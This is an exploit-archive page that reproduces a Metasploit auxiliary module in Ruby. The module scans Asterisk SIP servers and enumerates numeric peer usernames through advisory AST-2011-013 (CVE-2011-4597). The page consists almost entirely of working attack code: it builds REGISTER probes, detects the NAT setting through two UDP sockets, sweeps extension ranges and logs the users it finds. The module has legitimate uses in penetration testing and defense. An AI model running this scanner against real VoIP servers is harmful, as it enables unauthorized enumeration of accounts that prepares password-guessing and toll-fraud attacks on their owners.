SIP Username Enumerator For Asterisk

2011.12.24
Credit: metasploit
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

require 'msf/core'

#
# Auxiliary scanner that sends SIP REGISTER probes over UDP to enumerate
# numeric peer usernames on Asterisk servers (AST-2011-013 / CVE-2011-4597).
#
# A peer whose nat setting differs from the global sip nat setting answers on
# a different port than the rest, so two sockets are used: one bound to CPORT
# (the probe source port) and one bound to 5060. Whichever socket does NOT
# receive the reply for a nonexistent user is the one on which replies for
# existing, differently-configured peers are collected.
#
class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its options.
  def initialize
    super(
      'Name'        => 'SIP Username Enumerator for Asterisk (UDP) Security Advisory AST-2011-013, CVE-2011-4597',
      'Version'     => '$Revision: 1 $',
      'Description' => 'REGISTER scan for numeric peer usernames having a nat setting different to global sip nat setting. ' <<
        'Works even when alwaysauthreject=yes. For this exploit to work, the source port cannot be 5060. ' <<
        'For more details see Asterisk Project Security Advisory - AST-2011-013',
      'Author'      => 'Ben Williams',
      'License'     => MSF_LICENSE
    )

    register_options(
      [
        OptInt.new('BATCHSIZE', [true, 'The number of hosts to probe in each set', 256]),
        OptInt.new('MINEXT', [true, 'Starting extension', 0]),
        OptInt.new('MAXEXT', [true, 'Ending extension', 9999]),
        OptInt.new('PADLEN', [true, 'Cero padding maximum length', 4]),
        Opt::RPORT(5060),
        Opt::CHOST,
        Opt::CPORT(5070) # Source port must *not* be 5060 for this exploit to work.
      ], self.class)
  end

  # Define our batch size
  #
  # @return [Integer] the BATCHSIZE option as an integer
  def run_batch_size
    datastore['BATCHSIZE'].to_i
  end

  # Operate on an entire batch of hosts at once.
  #
  # Opens the two UDP sockets, enumerates every host in the batch and always
  # closes the sockets afterwards. Interrupts are re-raised; any other
  # exception is reported with print_error.
  #
  # @param batch [Enumerable<String>] target IP addresses
  def run_batch(batch)
    udp_sock = udp_sock_5060 = nil

    begin
      # SIP responses are either sent back to our source port or to 5060
      # so we need to have two sockets.
      udp_sock      = open_probe_socket(datastore['CPORT'].to_i)
      udp_sock_5060 = open_probe_socket(5060)

      batch.each { |ip| enumerate_host(ip, udp_sock, udp_sock_5060) }
    rescue ::Interrupt
      raise $!
    rescue ::Exception => e
      print_error("Unknown error: #{e.class} #{e}")
    ensure
      udp_sock.close if udp_sock
      udp_sock_5060.close if udp_sock_5060
    end
  end

  #
  # The response parsers
  #

  # Handles one received packet: skips provisional (100) responses, extracts
  # the user from the To header, prints it and stores a note.
  #
  # @param pkt [Array] a recvfrom result, [data, host, port]
  def parse_reply(pkt)
    return if not pkt[1]

    # Strip the IPv4-mapped IPv6 prefix without modifying the caller's array.
    rhost = pkt[1].sub(/^::ffff:/, '')
    rport = pkt[2]

    resp = pkt[0].split(/\s+/)[1]
    return if resp == '100' # ignore provisional responses, we will get a 401 next packet.

    testn = nil
    if pkt[0] =~ /^To\:\s*(.*)$/i
      testn = "#{$1.strip}".split(';')[0]
    end

    # Without a To header there is no user name to report.
    return unless testn

    print_status("Found user: #{testn} [Auth]")

    # Add Report
    report_note(
      :host  => rhost,
      :proto => 'udp',
      :sname => 'sip',
      :port  => rport,
      :type  => "Found user: #{testn} [Auth]",
      :data  => "Found user: #{testn} [Auth]"
    )
  end

  # Builds the SIP REGISTER request used to probe one extension.
  #
  # @param ip [String] target address, used in the request URI and To header
  # @param toext [String] extension (user name) to probe
  # @return [String] the request text
  def create_probe(ip, toext)
    suser = Rex::Text.rand_text_alphanumeric(rand(8) + 1)
    shost = Rex::Socket.source_address(ip)

    data  = "REGISTER sip:#{toext}@#{ip} SIP/2.0\r\n"
    data << "Via: SIP/2.0/UDP #{shost};branch=z9hG4bK.#{"%.8x" % rand(0x100000000)};rport;alias\r\n"
    data << "From: #{toext} <sip:#{suser}@#{shost}>;tag=70c00e8c\r\n"
    data << "To: #{toext} <sip:#{toext}@#{ip}>\r\n"
    data << "Call-ID: #{rand(0x100000000)}@#{shost}\r\n"
    data << "CSeq: 101 REGISTER\r\n"
    data << "Contact: <sip:#{suser}@#{shost}>\r\n"
    data << "Content-Length: 0\r\n"
    data << "Max-Forwards: 20\r\n"
  end

  # Left-pads a number with zeros up to the given width.
  #
  # Numbers that already have more digits than the width are returned
  # unpadded (previously this case returned nil, which produced a probe for
  # an empty extension).
  #
  # @param num [Integer] extension number
  # @param padding [Integer] minimum width of the result
  # @return [String] the zero-padded number
  def padnum(num, padding)
    num.to_s.rjust(padding.to_i, '0')
  end

  private

  # Create an unbound UDP socket if no CHOST is specified, otherwise
  # create a UDP socket bound to CHOST (in order to avail of pivoting),
  # and register it with add_socket.
  #
  # @param local_port [Integer] local port to bind
  # @return the created socket
  def open_probe_socket(local_port)
    sock = Rex::Socket::Udp.create(
      {
        'LocalHost' => datastore['CHOST'] || nil,
        'LocalPort' => local_port,
        'Context'   => { 'Msf' => framework, 'MsfExploit' => self }
      }
    )
    add_socket(sock)
    sock
  end

  # Sends one probe to RPORT on the target; unreachable / timeout / refused
  # errors are ignored so that a single failed send does not stop the scan.
  def send_probe(sock, data, ip)
    sock.sendto(data, ip, datastore['RPORT'].to_i, 0)
  rescue ::Interrupt
    raise $!
  rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
    nil
  end

  # Probes a nonexistent user to test what the global nat setting is.
  # If the response arrives back on the same socket, then global nat=yes.
  # If the response arrives back on 5060, then global nat=no (default).
  #
  # @return [String, nil] "yes", "no", or nil when neither socket got a reply
  def detect_global_nat(ip, udp_sock, udp_sock_5060)
    send_probe(udp_sock, create_probe(ip, "thisusercantexist"), ip)

    r = udp_sock.recvfrom(65535, 1) # returns [data,host,port]
    return "yes" if r && r[1]

    r = udp_sock_5060.recvfrom(65535, 1)
    return "no" if r && r[1]

    nil
  end

  # Reads and parses replies from the socket until a read returns no sender
  # within the given timeout (seconds).
  def drain_replies(sock, timeout)
    while (r = sock.recvfrom(65535, timeout)) && r[1]
      parse_reply(r)
    end
  end

  # Enumerates extensions MINEXT..MAXEXT on a single host.
  #
  # The global nat setting is determined per host, and a host that does not
  # answer the test probe is skipped without affecting the rest of the batch.
  def enumerate_host(ip, udp_sock, udp_sock_5060)
    global_nat = detect_global_nat(ip, udp_sock, udp_sock_5060)

    unless global_nat
      print_error("No response from server for initial test probe.")
      return
    end

    print_status("Asterisk appears to have global nat=#{global_nat}.")

    # With global nat=no we look for peers having nat=yes (replies come back
    # to our source port); with global nat=yes we look for peers having
    # nat=no (replies go to 5060).
    recv_sock = (global_nat == "no") ? udp_sock : udp_sock_5060

    mini   = datastore['MINEXT'].to_i
    maxi   = datastore['MAXEXT'].to_i
    padlen = datastore['PADLEN'].to_i

    (mini..maxi).each_with_index do |ext, idx|
      send_probe(udp_sock, create_probe(ip, padnum(ext, padlen)), ip)

      # Every tenth probe, briefly collect whatever replies have arrived.
      drain_replies(recv_sock, 0.02) if idx % 10 == 0
    end

    # Wait for late replies from this host before moving on, so they are not
    # left queued on a socket that the next host's nat test will read from.
    drain_replies(recv_sock, 3)
  end

end


Vote for this issue:
50%
50%


 

Thanks for your vote!


 

Thanks for your comment!
Your message will be held in quarantine for 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top